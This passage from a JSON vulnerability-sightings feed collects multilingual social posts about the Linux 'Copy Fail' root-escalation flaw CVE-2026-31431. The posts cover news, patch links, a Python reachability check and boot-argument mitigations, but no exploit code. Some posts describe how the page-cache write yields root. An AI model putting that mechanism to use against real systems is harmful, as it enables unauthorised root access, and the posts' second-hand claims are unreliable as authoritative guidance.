[\u2026]", "creation_timestamp": "2026-04-30T20:10:21.399276Z"}, {"uuid": "753448e8-9718-417d-aba8-62d9c5517ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Earl.mast.john1126.com.ap.brid.gy/post/3mkqgx54jwt52", "content": "So this tiny piece of Python code is responsible for Copy Fail (CVE-2026-31431)? I am considering testing this on one of my own machines to see if the exploit actually works. If it does, I will post a follow-up to warn others.\n\n#Linux #CopyFail", "creation_timestamp": "2026-04-30T20:22:50.516015Z"}, {"uuid": "317d1820-3d2b-4a45-aa8a-8399a9bfb0e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/omo.bsky.social/post/3mkqh7i4h5c27", "content": "SIOS\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30d6\u30ed\u30b0\u3092\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002\n\nLinux Kernel\u306e\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u306b\u3088\u308b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027(Copy Fail: CVE-2026-31431)\n\n#security #vulnerability #\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 #\u8106\u5f31\u6027 #linux #kernel #copyfail\n\nsecurity.sios.jp/vulnerabilit...", "creation_timestamp": "2026-04-30T20:27:29.904828Z"}, {"uuid": "7ad0e2e9-677f-43fe-bf0c-23e45d533f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ercanceviz.bsky.social/post/3mkqi3qbo7e2k", "content": "Linux\u2019ta Y\u0131llard\u0131r Kapat\u0131lmayan A\u00e7\u0131k Tespit\u00a0Edildi\n\nLinux \u00e7ekirde\u011finde ke\u015ffedilen Copy Fail (CVE-2026-31431) g\u00fcvenlik a\u00e7\u0131\u011f\u0131, yerel kullan\u0131c\u0131lar\u0131n root yetkisi almas\u0131na neden oluyor. Detaylar haberimizde.", "creation_timestamp": "2026-04-30T20:43:14.911726Z"}, {"uuid": "3fc67bf7-9116-4dcb-ab88-81c6f5977aa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/intel.overresearched.net/post/3mkqibwl63k2m", "content": "TeamPCP trojanises 4 SAP npm packages, scrapes CI memory for cloud/GH secrets. Dormant backdoor in 70K WP sites. Linux LPE CVE-2026-31431. Qinglong RCE drops cryptominers ITW.\n\nFull brief: intel.overresearched.net/2026/04/30/c...\n\n#Daily #ThreatIntel #InfoSec", "creation_timestamp": "2026-04-30T20:46:43.820499Z"}, {"uuid": "2ddf31d1-9d86-43a2-a434-44fbd83ddfc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/koshian.bsky.social/post/3mkqifqjlof26", "content": "\u3046\u30fc\u3093\u3001PoC \u307e\u3067\u516c\u958b\u3055\u308c\u3066\u3093\u306e\u304b\u3002\u30ed\u30fc\u30ab\u30eb\u304b\u3089\u6a29\u9650\u6607\u683c\u3067\u304d\u308b\u3060\u3051\u3060\u304b\u3089\u76f4\u3061\u306b\u5f71\u97ff\u306f\u306a\u3044\u306e\u304b\u3082\u77e5\u308c\u306a\u3044\u304c\u3081\u3061\u3083\u304f\u3061\u3083\u6016\u3044\u306a\u3002\u307e\u3042\u3046\u3061\u306f\u4f7f\u308f\u308c\u3066\u306a\u304b\u3063\u305f\u306e\u3067\u5f71\u97ff\u306f\u306a\u3044\u3060\u308d\u3046\u304c\u5bfe\u7b56\u3057\u3066\u304a\u3044\u305f\u307b\u3046\u304c\u3088\u3055\u305d\u3046\u304b\n\n\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01", "creation_timestamp": "2026-04-30T20:48:51.115736Z"}, {"uuid": "602750fc-4226-46eb-ba31-8ae7d7293fbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpqwjz55n22", "content": "[Copy Fail] The same 732-byte Python script roots every Linux distribution shipped since 2017. https://copy.fail/ Commentaires : voir le flux Atom ouvrir dans le navigateur\n\n#cve #cybers\u00e9curit\u00e9 #kernel #linux #cve-2026-31431\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T13:48:46.788547Z"}, {"uuid": "97dd3a18-81b0-4ea8-958d-06d704874b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/yukotan.bsky.social/post/3mkoavzl5322x", "content": "\u5404\u30c7\u30a3\u30b9\u30c8\u30ea\u306f\u30d1\u30c3\u30c1\u3092\u6e96\u5099\u4e2d\n\nCVE-2026-31431 | Ubuntu \nubuntu.com/security/CVE...\n\nCVE-2026-31431 - Debian\nsecurity-tracker.debian.org/tracker/CVE-...\n\nCVE-2026-31431 - Red Hat Customer Portal \naccess.redhat.com/security/cve...\n\nCVE-2026-31431 - Amazon Linux\nexplore.alas.aws.amazon.com/CVE-2026-314...", "creation_timestamp": "2026-04-29T23:29:28.568724Z"}, {"uuid": "8e996ec9-950f-489e-8894-1b1c9974ffb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/grenkoca/b82281a4706e936072979acf54b608df", "content": "", "creation_timestamp": "2026-04-29T23:47:58.000000Z"}, {"uuid": "b0af9e93-4459-4225-9081-0ad38968f925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/baldanders.info/post/3mkoc3legu52u", "content": "CVE-2026-31431\nnvd.nist.gov/vuln/detail/CV...\nwww.cve.org/CVERecord?id=CV...\n\n\uff1eAn unprivileged local user can write 4 controlled bytes into the page cache of any readable file on a Linux system, and use that to gain root.\ncopy.fail/", "creation_timestamp": "2026-04-29T23:50:28.497962Z"}, {"uuid": "e5a78f0b-9c46-414b-ac91-375187adc525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mstdn.baldanders.info/post/3mkoc3oq3cgg2", "content": "CVE-2026-31431\nhttps://nvd.nist.gov/vuln/detail/CVE-2026-31431\nhttps://www.cve.org/CVERecord?id=CVE-2026-31431\n\n\uff1eAn unprivileged local user can write 4 controlled bytes into the page cache of any readable file on a Linux system, and use that to gain root.\nhttps://copy.fail/", "creation_timestamp": "2026-04-29T23:50:37.055169Z"}, {"uuid": "7e657e60-427a-466b-a2ab-230eb08e9de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/feilong76.bsky.social/post/3mkqjrylosc2f", "content": "\u201c\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01\u201d htn.to/2xkDgYxA9M", "creation_timestamp": "2026-04-30T21:13:41.161124Z"}, {"uuid": "eb0ae852-2cc9-4655-8a4a-3bfab9a23d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mkqjui6enr42", "content": "Nine-Year-Old Linux Kernel Flaw Grants Unprivileged Users Full Root Access CVE-2026-31431 \"Copy Fail\" \u2014 a 732-byte Python script gives unprivileged users root on Ubuntu, RHEL, Amazon Linu...\n\n#TIGR #vulnerability\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T21:15:04.064055Z"}, {"uuid": "edbe8332-b265-46e4-b249-e84463cb1881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hatena-bookmark.bsky.social/post/3mkprbvluak2y", "content": "#\ud83d\udd16\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\n\n\u3053\u3093\u306b\u3061\u306f\uff01\u682a\u5f0f\u4f1a\u793e\u30a8\u30fc\u30a2\u30a4\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30e9\u30dc\u306e\u306f\u308b\u3077\u3068\u7533\u3057\u307e\u3059\u3002 \u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u30b3\u30de\u30f3\u30c9\u4e00\u767a\u3067root\u3092\u53d6\u308c\u3066\u3057\u307e\u3046Linux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u3001CopyFail (CVE-2026-31431) \u304c\u8a71\u984c\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002AI\u306b\u3088\u3063\u3066\u767a\u898b\u3055\u308c\u305f\u8ad6\u7406\u30d0\u30b0\u3067\u3001\u6c5a\u3057\u3066\u3082\u554f\u984c\u306a\u3044EC2\u74b0\u5883\u3092\u4f5c\u3063\u3066\u5b9f\u969b\u306b\u691c\u8a3c\u3057\u3066\u307f\u307e\u3057\u305f\u3002 \u3053\u306e\u8106\u5f31\u6027\u306f\u3001 \u4e00\u822c\u30e6\u30fc\u30b6\u30fc...\nhttps://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-04-30T13:55:06.460589Z"}, {"uuid": "40158c23-2cab-42ea-8f4a-8d36ec4d33ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkodegfob7j2", "content": "Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...\n\n#r/sysadmin\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T00:13:26.689117Z"}, {"uuid": "f0662d21-6785-4578-99d7-2784bb9b8a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpscgvlons2", "content": "Copy Fail : cette redoutable faille Linux permet d\u2019obtenir un acc\u00e8s root Copy Fail (CVE-2026-31431), c'est le nom de la faille critique d\u00e9couverte dans le noyau Linux. Elle offre un acc\u00e8s ...\n\n#Actu #Cybers\u00e9curit\u00e9 #Cybers\u00e9curit\u00e9 #Linux #Vuln\u00e9rabilit\u00e9\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T14:13:19.520812Z"}, {"uuid": "5d264563-98cf-420a-ab87-3713d274b36b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ahmandonk.bsky.social/post/3mkpsomr4q52i", "content": "\ud83d\udcf0 Celah Linux Baru 'Copy Fail' Beri Peretas Akses Root di Berbagai Distro Utama\n\n\ud83d\udc49 Baca artikel lengkap di sini: https://ahmandonk.com/2026/04/30/celah-linux-baru-copy-fail-beri-peretas-akses-root-di-berbagai-distro/\n\n#ahmandonkTechNews #beritaTeknologi #copyFail #cve-2026-31431 #dirtyPipe #ek", "creation_timestamp": "2026-04-30T14:20:06.563931Z"}, {"uuid": "1e0cf326-df53-4b4b-beb3-4b972c72174d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/master-sdl.bsky.social/post/3mkqkwv53qs2x", "content": "\u2757 Si vous administrez un PC sous Linux, toutes les distributions seraient concern\u00e9es par la CVE-2026-31431 (Local Privilege Escalation)\n\n\u2192 consultez ces recommandations :\ncert.europa.eu/publications...\n\n\u2192 rappel : mettez r\u00e9guli\u00e8rement \u00e0 jour votre syst\u00e8me pour b\u00e9n\u00e9ficier des mises \u00e0 jour de s\u00e9curit\u00e9", "creation_timestamp": "2026-04-30T21:34:16.878818Z"}, {"uuid": "19bcc0de-7ba9-4889-b6dd-c7bf1e98c448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercodenews.bsky.social/post/3mkpsor4axd2k", "content": "Copy Fail Linux Root Exploit Released: Critical Kernel Bug Lets Local Users Gain Full\u00a0Control\n\nIntroduction A newly disclosed Linux privilege escalation vulnerability named Copy Fail is drawing serious attention across the cybersecurity world. Tracked as CVE-2026-31431, the flaw affects Linux\u2026", "creation_timestamp": "2026-04-30T14:20:11.085320Z"}, {"uuid": "db590968-3557-46f7-a1eb-751d696c07ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://social.circl.lu/users/circl/statuses/116494107330904168", "content": "CVE-2026-31431 - crypto: algif_aead - Revert to operating out-of-place\n\ud83d\udd17 https://vulnerability.circl.lu/vuln/CVE-2026-31431#comments", "creation_timestamp": "2026-04-30T14:23:31.090186Z"}, {"uuid": "c5ee1a2e-15c8-4e11-ac36-2be2b169da05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://mastodon.social/ap/users/115426718704364579/statuses/116494202989973801", "content": "\ud83d\udcf0 Critical 'Copy Fail' Linux Flaw (CVE-2026-31431) Gives Instant Root on Major Distros\n\u26a0\ufe0f Critical 'Copy Fail' Linux flaw (CVE-2026-31431) allows any local user to get instant root access! Affects distros since 2017 like Ubuntu, Debian, RHEL. A simple, reliable exploit exists. Patch now! #Linux #CyberSecurity #LPE\n\ud83d\udd17 https://cyber.netsecops.io", "creation_timestamp": "2026-04-30T14:47:51.520795Z"}, {"uuid": "1b3033bc-077b-470b-9feb-acc92ef9d203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://ccb.belgium.be/advisories/warning-copy-fail-getting-root-major-linux-distributions-patch-immediately", "content": "", "creation_timestamp": "2026-04-30T12:50:07.000000Z"}, {"uuid": "ec89ef41-70a0-4075-89ff-8985a1b01e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dustymabe.fosstodon.org.ap.brid.gy/post/3mkqlqc6nosy2", "content": "The fix for CVE-2026-31431 (copy fail) has been released for Fedora CoreOS:\n\nhttps://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/message/AEZV7QKPNXGECMYQO4T4W5IQR4X5B62F/", "creation_timestamp": "2026-04-30T21:49:14.587099Z"}, {"uuid": "1e114e9d-d204-4bfa-9419-9f294eac2609", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/johonotodai.bsky.social/post/3mkqlxoh7qs2c", "content": "\u305f\u3063\u305f732\u30d0\u30a4\u30c8\u306ePython\u3067Linux\u30b5\u30fc\u30d0\u9665\u843d\u30029\u5e74\u9593\u8ab0\u3082\u6c17\u3065\u304b\u306a\u304b\u3063\u305fCVE-2026-31431\u306e\u6b63\u4f53\n\n732\u30d0\u30a4\u30c8\u306ePython\u3067Ubuntu\u3001RHEL\u3001SUSE\u306eroot\u304c\u53d6\u308c\u308b\u6df1\u523b\u306a\u5185\u5bb9\u3067\u3001\u767a\u898b\u8005\u306fAI\u652f\u63f4\u30c4\u30fc\u30eb\u3067\u308f\u305a\u304b1\u6642\u9593\u3067\u898b\u3064\u3051\u305f\u3068\u5831\u544a\u3057\u3066\u3044\u307e\u3059\u3002\n\nyoutu.be/XW01k5tT--0\n\n#Linux #\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 #AI\nCVE-2026-31431 details.", "creation_timestamp": "2026-04-30T21:52:38.586916Z"}, {"uuid": "a22930ce-38d9-47cc-b673-bdc3b865ba58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3mkqmeaaaum27", "content": "\u4eca\u65e5\u306eZenn\u30c8\u30ec\u30f3\u30c9\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027CopyFail (CVE-2026-31431) \u306b\u3064\u3044\u3066\u306e\u89e3\u8aac\u8a18\u4e8b\u3067\u3059\u3002\n\u4e00\u822c\u30e6\u30fc\u30b6\u30fc\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u3092\u6c5a\u67d3\u3059\u308b\u3053\u3068\u3067\u3001\u5bb9\u6613\u306broot\u6a29\u9650\u3092\u596a\u53d6\u3067\u304d\u308b\u3053\u3068\u3092\u5b9f\u8a3c\u3057\u3066\u3044\u307e\u3059\u3002\n\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u30d0\u30a4\u30ca\u30ea\u306f\u66f8\u304d\u63db\u308f\u3089\u306a\u3044\u305f\u3081\u691c\u77e5\u304c\u56f0\u96e3\u3067\u3042\u308a\u3001\u78ba\u8a8d\u306b\u306f\u30ad\u30e3\u30c3\u30b7\u30e5\u3068\u30c7\u30a3\u30b9\u30af\u306e\u30cf\u30c3\u30b7\u30e5\u6bd4\u8f03\u304c\u5fc5\u8981\u3067\u3059\u3002\n\u5bfe\u7b56\u3068\u3057\u3066\u65e9\u6025\u306a\u30d1\u30c3\u30c1\u9069\u7528\u304c\u63a8\u5968\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n", "creation_timestamp": "2026-04-30T21:59:35.500778Z"}, {"uuid": "1a1bcc08-ab7e-486f-ab21-f5d88ed1c235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/netsecio.bsky.social/post/3mkpuazkvuz2w", "content": "\u26a0\ufe0f Critical 'Copy Fail' Linux flaw (CVE-2026-31431) allows any local user to get instant root access! Affects distros since 2017 like Ubuntu, Debian, RHEL. A simple, reliable exploit exists. Patch now! #Linux #CyberSecurity #LPE", "creation_timestamp": "2026-04-30T14:48:18.538166Z"}, {"uuid": "497b1dd4-4853-4fa3-93e5-b4bdb0d83817", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mkpv6xnioc2b", "content": "Copy Fail (CVE-2026-31431) is a severe logic flaw in the Linux kernel affecting almost every distribution since 2017. Patch your systems now!\n\nMore details here: ostechnix.com/copy-fail-cv... \n\n#Copyfail #CVE202631431 #Pagecache #Linuxkernel #LinuxPrivilegeEscalation #Security #XintCode #TaeyangLee", "creation_timestamp": "2026-04-30T15:05:07.662925Z"}, {"uuid": "6fc3c360-3dc6-4712-8ebe-65d670517c89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jianmin.defcon.social.ap.brid.gy/post/3mkpv2co5snh2", "content": "`python3 -c 'import socket; s=socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\")); print(\"REACHABLE\")' 2>&1`\n\nIf you see: \"file not found\" then you're probably not vulnerable to copy.fail (CVE-2026-31431)\n\nIf you see \"REACHABLE,\" that [\u2026]", "creation_timestamp": "2026-04-30T15:05:22.456779Z"}, {"uuid": "a28dc140-d377-41e2-af49-e1a0f23694ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linuxiac.bsky.social/post/3mkpvdpso5k25", "content": "Copy Fail (CVE-2026-31431) is a Linux kernel vulnerability that allows local unprivileged users to gain root access on affected systems.\nlinuxiac.com/copy-fail-li...\n\n#Linux #Kernel #OpenSource", "creation_timestamp": "2026-04-30T15:07:46.691202Z"}, {"uuid": "bae00dc9-2593-40cc-ab6f-065aba4e13ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mkoegipxbo2x", "content": "Major Linux distributions are patching a local privilege escalation vulnerability known as Copy Fail (CVE-2026-31431) due to a logic flaw in the kernel.\n", "creation_timestamp": "2026-04-30T00:32:22.453832Z"}, {"uuid": "405df460-e717-4704-b7f6-8a75362d11ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cybersecurity.page/post/3mkoidwytne25", "content": "A critical vulnerability, CVE-2026-31431, has been announced, allowing root access on nearly all major Linux distributions. It presents a significant security risk for systems that users can log onto.", "creation_timestamp": "2026-04-30T01:42:30.850563Z"}, {"uuid": "45264670-c4b1-47ae-a193-67e450a1b050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyberkendra.com/post/3mkqnqtnoc227", "content": "CVE-2026-31431 \"Copy Fail\": a logic bug in the Linux kernel lets any local user get root on Ubuntu, RHEL, Amazon Linux, and SUSE since 2017.\n\nRead Details - www.cyberkendra.com/2026/04/a-73...\n\n#linuxsecurity #ubuntu #security #CopyFail #INTERNET", "creation_timestamp": "2026-04-30T22:24:38.482633Z"}, {"uuid": "d275dea8-8d01-4b97-88e5-591f371365fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/insomnia.gr/post/3mkqosppdke25", "content": "\u039a\u03c1\u03af\u03c3\u03b9\u03bc\u03b7 \u03b5\u03c5\u03c0\u03ac\u03b8\u03b5\u03b9\u03b1 (CVE-2026-31431) \u03c3\u03c4\u03bf kernel \u03c4\u03bf\u03c5 Linux \u03bc\u03b5 \u03c4\u03b7\u03bd \u03bf\u03bd\u03bf\u03bc\u03b1\u03c3\u03af\u03b1 Copy Fail, \u03b5\u03c0\u03b9\u03c4\u03c1\u03ad\u03c0\u03b5\u03b9 \u03b1\u03c0\u03cc\u03ba\u03c4\u03b7\u03c3\u03b7 root, \u03bc\u03b5 \u03b5\u03cd\u03ba\u03bf\u03bb\u03b7 \u03b5\u03ba\u03bc\u03b5\u03c4\u03ac\u03bb\u03bb\u03b5\u03c5\u03c3\u03b7 \u03ba\u03b1\u03b9 \u03b1\u03bd\u03ac\u03b3\u03ba\u03b7 \u03ac\u03bc\u03b5\u03c3\u03bf\u03c5 patch. www.insomnia.gr/articles/ope...", "creation_timestamp": "2026-04-30T22:43:28.338162Z"}, {"uuid": "0840882a-fe3a-45aa-a3af-9ca6c46f330e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gullevek.famichiki.jp.ap.brid.gy/post/3mkqow7q6yml2", "content": "Copy Fail \u2014 CVE-2026-31431 https://copy.fail/\n\nAs usual it is so hard to find out if the mainline kernel is already patched or not.", "creation_timestamp": "2026-04-30T22:45:34.993937Z"}, {"uuid": "d0ca1c1f-e0da-4044-a4b9-53c653e03b9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116496097678724677", "content": "Unlike what the buffoons at Theori published as a \"mitigation\", the folks at Red Hat actually published a viable mitigation\nSpecifically, edit your grub (or whatever you use to load your kernel) to have one of the following arguments:initcall_blacklist=algif_aead_initinitcall_blacklist=af_alg_initinitcall_blacklist=crypto_authenc_esn_module_init\nWith such boot arguments to the Linux kernel, the affected bits won't be reachable.", "creation_timestamp": "2026-04-30T22:49:42.453931Z"}, {"uuid": "880c3e54-511d-4b5a-92c5-d2046baee527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/vuldb/statuses/116497063036419923", "content": "Some increased actor activities are shown targeting Linux Kernel (CVE-2026-31431) https://vuldb.com/vuln/358784/cti", "creation_timestamp": "2026-05-01T02:55:11.869771Z"}, {"uuid": "0b37afe0-1da9-4a42-92b4-9ded6a0dde38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bricebowl.bsky.social/post/3mkqqu4xrlc2n", "content": "The Ubuntu situation is wild:\n\u2022 Ubuntu posts guidance on CVE-2026-31431\n\u2022 Official mitigation fails if ran verbatim\n    - Delimed string argument with non-deliming quotes (double left/right - U+201)\n   - Redirects sudo output to protected file (Won\u2019t work unless you\u2019re root)\n\u2022 Gets DDoS'd \ud83d\udc80", "creation_timestamp": "2026-04-30T23:20:07.020648Z"}, {"uuid": "4fd1a600-e0df-42fc-bb1f-558abed90797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker-news-jp.bsky.social/post/3mkoihagbr32i", "content": "\u30b3\u30d4\u30fc\u5931\u6557 \u2013 CVE-2026-31431\nCopy Fail \u2013 CVE-2026-31431\n\n\ud83d\udd3a 571\n\ud83d\udcac 57\n\ud83d\udd17 HN Post | Article", "creation_timestamp": "2026-04-30T01:44:21.810420Z"}, {"uuid": "0296a9e9-be56-430c-ba87-7cc0f97c26e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 